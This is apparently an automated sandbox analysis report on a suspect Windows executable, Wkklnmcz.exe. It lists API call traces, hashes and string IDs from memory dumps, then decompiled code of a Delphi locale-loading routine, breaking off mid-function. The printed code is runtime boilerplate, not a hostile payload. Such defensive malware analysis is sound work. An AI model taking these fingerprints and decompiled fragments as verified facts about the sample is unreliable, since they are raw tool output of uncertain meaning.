                                                                            • Runtime error at 00000000 , xrefs: 004045EE, 0040462D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: FileHandleWrite$Message
                                                                            • String ID: Error$Runtime error at 00000000
                                                                            • API String ID: 1570097196-2970929446
                                                                            • Opcode ID: 486cc6febccf89cf48693867195bad861259d6e457c75e9bf5e0aeb01c8351a7
                                                                            • Instruction ID: 95cfc67e252f177aabf72d71697ea3d849ed0d739da66028a04d1f7d325712f5
                                                                            • Opcode Fuzzy Hash: 486cc6febccf89cf48693867195bad861259d6e457c75e9bf5e0aeb01c8351a7
                                                                            • Instruction Fuzzy Hash: 2CF062A06803C475EA10B7655D46F9622484785F1AF2446BFF310F40F2BAFC89C49B2F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SaveDC.GDI32(?), ref: 0044022D
                                                                              • Part of subcall function 00439028: GetWindowOrgEx.GDI32(00000000), ref: 00439036
                                                                              • Part of subcall function 00439028: SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 0043904C
                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00440266
                                                                            • GetWindowLongA.USER32 ref: 0044027A
                                                                            • GetWindowLongA.USER32 ref: 0044029B
                                                                            • SetRect.USER32 ref: 004402CB
                                                                            • DrawEdge.USER32(?,?,00000000,00000000), ref: 004402DA
                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00440303
                                                                            • RestoreDC.GDI32(?,?), ref: 00440382
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                                            • String ID:
                                                                            • API String ID: 2976466617-0
                                                                            • Opcode ID: 4840986328c7cd9c4a77fec9c8fe1af57394d4554ee4a78261ce9734ac6bca01
                                                                            • Instruction ID: 4aa519c723c9a553b380c3e93beb146f7b5c6051756f74ab7ed9f7139ab4c4a9
                                                                            • Opcode Fuzzy Hash: 4840986328c7cd9c4a77fec9c8fe1af57394d4554ee4a78261ce9734ac6bca01
                                                                            • Instruction Fuzzy Hash: D341FC75A00208AFEB10DFD9C985F9EB7F9EF48304F1141A5BA04EB391D678AE41CB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetMenu.USER32(00000000), ref: 004506A0
                                                                            • SetMenu.USER32(00000000,00000000), ref: 004506BD
                                                                            • SetMenu.USER32(00000000,00000000), ref: 004506F2
                                                                            • SetMenu.USER32(00000000,00000000,00000000,00450790), ref: 0045070E
                                                                              • Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 00450755
                                                                            Strings
                                                                            • (7B , xrefs: 004505EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Menu$LoadStringWindow
                                                                            • String ID: (7B
                                                                            • API String ID: 1738039741-3251261122
                                                                            • Opcode ID: 0ccf8dde2134a50e6ee81cdb3be7b335862480176179d592b1f0e745e2d916bc
                                                                            • Instruction ID: 391e45c69739de599930f1571a303692f4f31b01482e4dca29fa4868e8c2a8c8
                                                                            • Opcode Fuzzy Hash: 0ccf8dde2134a50e6ee81cdb3be7b335862480176179d592b1f0e745e2d916bc
                                                                            • Instruction Fuzzy Hash: F151AE34A043445BEB24EF39998675B2694AB8430AF0544BFFC059B397CABCDC498B99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 004273B0: GetObjectA.GDI32(?,00000004), ref: 004273C7
                                                                              • Part of subcall function 004273B0: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 004273EA
                                                                            • GetDC.USER32(00000000), ref: 004285C6
                                                                            • CreateCompatibleDC.GDI32(?), ref: 004285D2
                                                                            • SelectObject.GDI32(?), ref: 004285DF
                                                                            • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00428637,?,?,?,?,00000000), ref: 00428603
                                                                            • SelectObject.GDI32(?,?), ref: 0042861D
                                                                            • DeleteDC.GDI32(?), ref: 00428626
                                                                            • ReleaseDC.USER32 ref: 00428631
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                                                                            • String ID:
                                                                            • API String ID: 4046155103-0
                                                                            • Opcode ID: 0ef47c05c1142c1c4212e51049af1cabbe0614bb78c017c0a708da15428bdc0c
                                                                            • Instruction ID: fc760d696f5b6bfeae7a67bf9a168a54974abfe34dfe22b54ea61c4cebc6b826
                                                                            • Opcode Fuzzy Hash: 0ef47c05c1142c1c4212e51049af1cabbe0614bb78c017c0a708da15428bdc0c
                                                                            • Instruction Fuzzy Hash: 72119371E052186BDB10EBE9DC51EAEB3FCEF08704F4144BAB614E7680DA799D508B68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DrawEdge.USER32(00000000,?,00000006,?), ref: 004304B3
                                                                            • OffsetRect.USER32(?,00000001,00000001), ref: 00430504
                                                                            • DrawTextA.USER32(00000000,00000000,?,?,?), ref: 0043053D
                                                                            • OffsetRect.USER32(?,000000FF,000000FF), ref: 0043054A
                                                                            • DrawTextA.USER32(00000000,00000000,?,?,?), ref: 004305B5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Draw$OffsetRectText$Edge
                                                                            • String ID:
                                                                            • API String ID: 3610532707-0
                                                                            • Opcode ID: a5c1db12bf0ac30249b93611e375069da9dd1bc870eb88bb1d58e4da80817d54
                                                                            • Instruction ID: 3dcdb83b52eea41a6f7c2ae4f71efb06fc793ff540cda049268810552e419287
                                                                            • Opcode Fuzzy Hash: a5c1db12bf0ac30249b93611e375069da9dd1bc870eb88bb1d58e4da80817d54
                                                                            • Instruction Fuzzy Hash: E451B770A00214AFDB10EB69C891B9FB7A5AF08324F55526BF914A7392C77CEE408B59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6868910fa89a8018b263f99a25884595e32ff1315658f09768cdbd9cf83d8de8
                                                                            • Instruction ID: a3695b4b82a7dda22394f8c72c2d1be36efbcd0d540cfdc55166254eebed839c
                                                                            • Opcode Fuzzy Hash: 6868910fa89a8018b263f99a25884595e32ff1315658f09768cdbd9cf83d8de8
                                                                            • Instruction Fuzzy Hash: E511A521B002495ADB20AA7B8929B5B27885F4970CF0422ABBD11A7393CA3CCC09C75C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0044CBE4: GetActiveWindow.USER32 ref: 0044CBE7
                                                                              • Part of subcall function 0044CBE4: GetCurrentThreadId.KERNEL32 ref: 0044CBFC
                                                                              • Part of subcall function 0044CBE4: EnumThreadWindows.USER32(00000000,0044CBC4), ref: 0044CC02
                                                                              • Part of subcall function 00457DC8: GetCursor.USER32(?,?,?,?,?,?,?,?,?,?,?,004580D9,00000000,004583B7), ref: 00457DE3
                                                                              • Part of subcall function 00457DC8: GetIconInfo.USER32(00000000,?), ref: 00457DE9
                                                                            • ClientToScreen.USER32(?,?), ref: 00458161
                                                                            • OffsetRect.USER32(?,?,?), ref: 00458178
                                                                            • OffsetRect.USER32(?,?,?), ref: 004582A4
                                                                              • Part of subcall function 00457B58: SetTimer.USER32 ref: 00457B72
                                                                            Strings
                                                                            • 4jC , xrefs: 0045813E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: OffsetRectThread$ActiveClientCurrentCursorEnumIconInfoScreenTimerWindowWindows
                                                                            • String ID: 4jC
                                                                            • API String ID: 2591747986-2900625241
                                                                            • Opcode ID: b8343d64523a10379c1ff20852f6b1ca7638a93d7df97c3be9be529c8dc35029
                                                                            • Instruction ID: 3c06f24524cbe1945d16a03846c9b40712580fa28ccc941ba7e8c22a91bf12dc
                                                                            • Opcode Fuzzy Hash: b8343d64523a10379c1ff20852f6b1ca7638a93d7df97c3be9be529c8dc35029
                                                                            • Instruction Fuzzy Hash: 27C1E435A00618CFCB10DFA9C494A9EB7F5BF49304F1081AAE905EB366DB34AD4ACF45
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040C72F), ref: 0040C5DF
                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040C72F), ref: 0040C601
                                                                              • Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772
                                                                            Strings
                                                                            • Tv@ , xrefs: 0040C5C8
                                                                            • Lv@ , xrefs: 0040C5B9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: FileLoadModuleNameQueryStringVirtual
                                                                            • String ID: Lv@$Tv@
                                                                            • API String ID: 902310565-3490928387
                                                                            • Opcode ID: 24279c15491266c301eb2aa81648ac00ce9ad9d101245f32d7359d387ba785dc
                                                                            • Instruction ID: c01818685c40b8fea18ad10fd3e77254e6e7d063cfafddee118467fe47f8fec1
                                                                            • Opcode Fuzzy Hash: 24279c15491266c301eb2aa81648ac00ce9ad9d101245f32d7359d387ba785dc
                                                                            • Instruction Fuzzy Hash: 30413670900668DFDB61DF64CC84BDAB7F5AB49304F4040EAE508AB391D7B8AE84CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • ExplicitLeft , xrefs: 0043C3A6
                                                                            • ExplicitTop , xrefs: 0043C3DE
                                                                            • IsControl , xrefs: 0043C36E
                                                                            • ExplicitWidth , xrefs: 0043C416
                                                                            • ExplicitHeight , xrefs: 0043C44E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ExplicitHeight$ExplicitLeft$ExplicitTop$ExplicitWidth$IsControl
                                                                            • API String ID: 0-1359656977
                                                                            • Opcode ID: e198b18a899ee8fbe602b3c221bc617dfed544fe1bcf56702e28467d685845b1
                                                                            • Instruction ID: cbb0c5206f246dd0b0ff20d4357b65f0a75d08649d638fbcb0a39a926d9dba2b
                                                                            • Opcode Fuzzy Hash: e198b18a899ee8fbe602b3c221bc617dfed544fe1bcf56702e28467d685845b1
                                                                            • Instruction Fuzzy Hash: C3314F34640614AFDF14CA58D4D5A7673E8DF1D728F20A09AF801EF386CB28EC019F59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 00438609
                                                                            • GetDesktopWindow.USER32 ref: 00438739
                                                                            • SetCursor.USER32(00000000), ref: 0043878E
                                                                              • Part of subcall function 004440E4: ImageList_EndDrag.COMCTL32(?,-00000010,00438769), ref: 00444100
                                                                            • SetCursor.USER32(00000000), ref: 00438779
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CursorDesktopWindow$DragImageList_
                                                                            • String ID:
                                                                            • API String ID: 617806055-0
                                                                            • Opcode ID: 3bcd75b5abe411c5b0deca700f6720d75792e6beb4e63713e0ee92e8f9771c6a
                                                                            • Instruction ID: 08362208b1a53e947958c9dd7a602420f7f888ca1ef680945a718b5847218c5a
                                                                            • Opcode Fuzzy Hash: 3bcd75b5abe411c5b0deca700f6720d75792e6beb4e63713e0ee92e8f9771c6a
                                                                            • Instruction Fuzzy Hash: C7915274600240EFC704DF29E986A15B7E1BB48308F15916AF4458B37AEBB8ED45CF6B
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 004265A0: EnterCriticalSection.KERNEL32(00466380,00000000,00424F52,00000000,00424FB1), ref: 004265A8
                                                                              • Part of subcall function 004265A0: LeaveCriticalSection.KERNEL32(00466380,00466380,00000000,00424F52,00000000,00424FB1), ref: 004265B5
                                                                              • Part of subcall function 004265A0: EnterCriticalSection.KERNEL32(00000038,00466380,00466380,00000000,00424F52,00000000,00424FB1), ref: 004265BE
                                                                              • Part of subcall function 004297F8: GetDC.USER32(00000000), ref: 0042984E
                                                                              • Part of subcall function 004297F8: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00429863
                                                                              • Part of subcall function 004297F8: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042986D
                                                                              • Part of subcall function 004297F8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428423,00000000,004284AF), ref: 00429891
                                                                              • Part of subcall function 004297F8: ReleaseDC.USER32 ref: 0042989C
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00428425
                                                                            • SelectObject.GDI32(00000000,?), ref: 0042843E
                                                                            • SelectPalette.GDI32(00000000,?,000000FF), ref: 00428467
                                                                            • RealizePalette.GDI32(00000000), ref: 00428473
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
                                                                            • String ID:
                                                                            • API String ID: 979337279-0
                                                                            • Opcode ID: 93bebc2edd455ddf18fa106c5646cc94971223008aa3a34a3a8727028a1c549a
                                                                            • Instruction ID: e87ff1c804d76903f950264df5696ada03ea7b14f1511ea4f0a767a0c079a61f
                                                                            • Opcode Fuzzy Hash: 93bebc2edd455ddf18fa106c5646cc94971223008aa3a34a3a8727028a1c549a
                                                                            • Instruction Fuzzy Hash: AA310934B01664EFD704EB59D981D4DB7F5EF48314B6241AAF804AB362DA38EE40DB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetMenuState.USER32 ref: 00434033
                                                                            • GetSubMenu.USER32 ref: 0043403E
                                                                            • GetMenuItemID.USER32(?,?), ref: 00434057
                                                                            • GetMenuStringA.USER32(?,?,?,?,?), ref: 004340AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Menu$ItemStateString
                                                                            • String ID:
                                                                            • API String ID: 306270399-0
                                                                            • Opcode ID: c83668f70c58b27ff1ae3854190cf90560c38d16cda432900dd57c84b320ed91
                                                                            • Instruction ID: 11efe109d52895c86013a67b98394270421268660deb29a3708cc45bd7cb4ea2
                                                                            • Opcode Fuzzy Hash: c83668f70c58b27ff1ae3854190cf90560c38d16cda432900dd57c84b320ed91
                                                                            • Instruction Fuzzy Hash: 0511AF31701214AFC714EE69CC809EF7BE8AF89364F10542AF909D7382CA38AD019768
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • MulDiv.KERNEL32(?), ref: 0043A4ED
                                                                            • MulDiv.KERNEL32(?), ref: 0043A50A
                                                                            • MulDiv.KERNEL32(?), ref: 0043A527
                                                                            • MulDiv.KERNEL32(?), ref: 0043A544
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 343edcee43f4d4a2bc000d28523ac80406228f184dd9ae9d624a554c2fb86fce
                                                                            • Instruction ID: f4bc81ab66daf8a9df15c71cec539322716d65d0bf1aec78caf828b6dab18041
                                                                            • Opcode Fuzzy Hash: 343edcee43f4d4a2bc000d28523ac80406228f184dd9ae9d624a554c2fb86fce
                                                                            • Instruction Fuzzy Hash: 6A0116613002182BC724BD2B5C45F5B3AADDBC9754F01507E791A9B383EAA9ED2082A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 004383E9
                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,?,-00000010,00000000,00438454,-000000F7,?,00000000,0043800E,?,-00000010,?), ref: 004383F2
                                                                            • GlobalFindAtomA.KERNEL32(00000000), ref: 00438407
                                                                            • GetPropA.USER32 ref: 0043841E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                            • String ID:
                                                                            • API String ID: 2582817389-0
                                                                            • Opcode ID: c8253abe16581fcb99d44ece300b1cfe7add3b6cfb4c013908db5c544134e519
                                                                            • Instruction ID: edcf506c367d5b21f12e8bc81a0964d5f28cf71cb3e8e791f3115fe585ddaeb4
                                                                            • Opcode Fuzzy Hash: c8253abe16581fcb99d44ece300b1cfe7add3b6cfb4c013908db5c544134e519
                                                                            • Instruction Fuzzy Hash: D3F0276120622367D2307B726D4287F514C8D143A4B81503FFD00E2141FB6CDC52A1BF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040C72F), ref: 0040C5DF
                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040C72F), ref: 0040C601
                                                                              • Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772
                                                                            Strings
                                                                            • Lv@ , xrefs: 0040C5B9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: FileLoadModuleNameQueryStringVirtual
                                                                            • String ID: Lv@
                                                                            • API String ID: 902310565-2306355798
                                                                            • Opcode ID: a64f8a922244f8bc9df9dcd3d48b1ff787754f54841e870c1e5b0c2d58ac1ace
                                                                            • Instruction ID: 312cfa349de001423b8fa7d1abb7a1f31512e968929e1d2ab1301cf878b75628
                                                                            • Opcode Fuzzy Hash: a64f8a922244f8bc9df9dcd3d48b1ff787754f54841e870c1e5b0c2d58ac1ace
                                                                            • Instruction Fuzzy Hash: AB311870900658DFDB61DB64CD81BDAB7F9AB49304F4040FAE508A7291E7B8AE848F55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0040A76A), ref: 0040A702
                                                                            • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0040A76A), ref: 0040A708
                                                                            Strings
                                                                            • yyyy , xrefs: 0040A6DD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: DateFormatLocaleThread
                                                                            • String ID: yyyy
                                                                            • API String ID: 3303714858-3145165042
                                                                            • Opcode ID: 6cf301cd4dbb5b34b884b87cd4e9d6bd7c982b661da83cb5c451281789fad814
                                                                            • Instruction ID: 8081e552295268892be29cc280909309cbc7073684cf05299d24970e3d403a10
                                                                            • Opcode Fuzzy Hash: 6cf301cd4dbb5b34b884b87cd4e9d6bd7c982b661da83cb5c451281789fad814
                                                                            • Instruction Fuzzy Hash: F12141756002189BDB11DBA5C982AAE73B8EF48700F5140B7F905F7381D738DE54D76A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • Array , xrefs: 004143F4
                                                                            • ByRef , xrefs: 00414407
                                                                            • Any , xrefs: 0041436E
                                                                            • String , xrefs: 00414356
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.330854727.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.330835402.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331024322.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331049393.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000000.00000002.331067206.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Any$Array $ByRef $String
                                                                            • API String ID: 0-2719049652
                                                                            • Opcode ID: 4c1bf49a875d0ce1e1ca93e9c8975ea5f3d59849904bb5522f9a09700d948057
                                                                            • Instruction ID: 730d68d0bf57e40a1c12294faa45c6f4f3c6e64727781c33dba2699a711d9df2
                                                                            • Opcode Fuzzy Hash: 4c1bf49a875d0ce1e1ca93e9c8975ea5f3d59849904bb5522f9a09700d948057
                                                                            • Instruction Fuzzy Hash: 732137707002148BC720EB55C841BDA73E5EBC8714F50817BBA64A37D1DB7C9E818A9E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Analysis Process: Wkklnmcz.exe PID: 5352 Parent PID: 3352

                                                                            Executed Functions

                                                                            C-Code - Quality: 87%
E00405E80(CHAR* __eax) {
    CHAR* _v8;
    void* _v12;
    char _v15;
    char _v17;
    char _v18;
    char _v22;
    int _v28;
    char _v289;
    long _t44;
    long _t61;
    long _t63;
    CHAR* _t74;
    struct HINSTANCE__* _t81;
    struct HINSTANCE__* _t88;
    CHAR* _t99;
    CHAR* _t100;
    intOrPtr _t104;
    struct HINSTANCE__* _t112;
    void* _t115;
    void* _t117;
    intOrPtr _t118;

    _t115 = _t117;
    _t118 = _t117 + 0xfffffee0;
    _v8 = __eax;
    GetModuleFileNameA(0, &_v289, 0x105);
    _v22 = 0;
    _t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019, &_v12); // executed
    if(_t44 == 0) {
        L3:
        _push(_t115);
        _push(0x405f85);
        _push( *[fs:eax]);
        *[fs:eax] = _t118;
        _v28 = 5;
        E00405CBC( &_v289, 0x105);
        if(RegQueryValueExA(_v12, &_v289, 0, 0, &_v22, &_v28) != 0 && RegQueryValueExA(_v12, E004060EC, 0, 0, &_v22, &_v28) != 0) {
            _v22 = 0;
        }
        _v18 = 0;
        _pop(_t104);
        *[fs:eax] = _t104;
        _push(0x405f8c);
        return RegCloseKey(_v12);
    } else {
        _t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019, &_v12); // executed
        if(_t61 == 0) {
            goto L3;
        } else {
            _t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019, &_v12); // executed
            if(_t63 != 0) {
                lstrcpynA( &_v289, _v8, 0x105);
                GetLocaleInfoA(GetThreadLocale(), 3, &_v17, 5);
                _t112 = 0;
                if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                    _t99 = &(( &_v289)[lstrlenA( &_v289)]);
                    L12:
                    if( *_t99 != 0x2e && _t99 != &_v289) {
                        _t99 = _t99 - 1;
                        goto L12;
                    }
                    _t74 = &_v289;
                    if(_t99 != _t74) {
                        _t100 = &(_t99[1]);
                        if(_v22 != 0) {
                            lstrcpynA(_t100, &_v22, 0x105 - _t100 - _t74);
                            _t112 = LoadLibraryExA( &_v289, 0, "true");
                        }
                        if(_t112 == 0 && _v17 != 0) {
